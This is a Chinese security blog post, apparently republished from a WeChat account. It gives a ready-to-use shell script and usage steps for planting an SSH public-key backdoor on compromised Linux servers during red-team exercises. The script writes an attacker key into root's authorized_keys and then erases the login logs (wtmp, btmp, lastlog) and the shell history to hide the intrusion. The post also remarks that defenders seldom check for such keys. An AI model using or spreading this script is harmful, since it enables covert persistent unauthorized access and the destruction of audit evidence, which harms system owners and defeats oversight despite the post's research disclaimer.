马上就又要开始HVV了,那么不管你是红队还是蓝队,是攻陷还是反制,都需要对拿到权限的机器保留后面,这里呢就是最简单的linux后面,密钥登录,那么怎么快速添加后门,并批量管理呢?
使用方法:
1.首先随便找一台Linux机器ssh-keygen生成密钥对,默认保存在/root/.ssh/
2.打开cmd,输入命令ssh root@123.456.789.101 < C:UserDesktopXX.sh 然后会提示你输入密码
3.使用密钥登陆,输入命令 ssh -i C:UserDesktopid_rsa [email protected]
*脚本会自动检测是否存在该公钥,没有就会立即上传,这样无论对方修改什么密码,都可以使用私钥进行ssh登陆。(一般甲方人员不会检查公钥后门吧,好多人都不知道ssh可以私钥登陆)
~~卧槽,接下来该写啥了,忘词了
哦对了,还需要把公钥写进脚本里!~~
先看下小脚本源码把
# Author: qingy# Date: 20200920# SSH KEY INJECTION# PASTE YOUR PUBLIC KEY HEREKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC4j7b6lXh0s2ROcCRlypc3ywpPIDuinq6PSY84VPJVW1EAxLB8R3nWjyS9aHXYLH8OObiwu86+ItWZKIpa5HK49csEAjo1JggGyVJQnCKyngDiGwJS+5gCq2B4Q92NIfMvRq0SyaBru1BDmPe0+gTDlt7wjbIeLLMMDVtMvG+8JIAlyhG5kqn7psHS1ZL92/BfJtpwOsN39KzS0ocEr3kT7J0SFPuHnSQgunqmxZUfCLN9EDYnizzUTvFvaRxVVRsNLflLh8SsGCbTB5GzYCq9JhydU/f717EH/FjeZHZZjlkec4kGvLMn9aIJAGePeNnTHequjM3/Ufato4R2C90nJKH0xECR0SFvD1LKOgirIKw/ndjuDskU8Fm0sATV9wnxWHMagkRen9aOnOfCZUH5lah91ppfjkU7qpbvQIqmeooscGGLHWm+J2yg2AtUX+KOz4xWqMa/WWTDIZbqZBLaVmcI5gH3FuNGB8PGFMpQL7chxXAVzonBKOaUpD3yh70= root@DESKTOP-82IGV9G"KEY_FLAG=$(echo $KEY | awk '{print $2}')KFOUND=""AUTHFILE=/root/.ssh/authorized_keysif [ -f $AUTHFILE ]; thenKFOUND=$(grep -m 1 "${KEY_FLAG}" $AUTHFILE);fi#echo $KFOUNDif [ -z "${KFOUND}" ]; thenecho "INSTALLING KEY...";echo "" >> $AUTHFILEecho "${KEY}" >> $AUTHFILEecho "" >> $AUTHFILEelseecho "KEY ALREADY EXISTS!";fi# CLEAR LOGecho "" > /var/log/wtmpecho "" > /var/log/btmpecho "" > /var/log/lastloghistory -cexit
在KEY里面填写你的公钥就好了
脚本里携带清除日志的命令 :cl && history -c
加KEY是这样的,下图
密钥登陆是这样子的,下图:
乐于分享,大佬勿喷。
原文始发于微信公众号(Qingy之安全):Linux快速添加密钥,并清除痕迹。
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论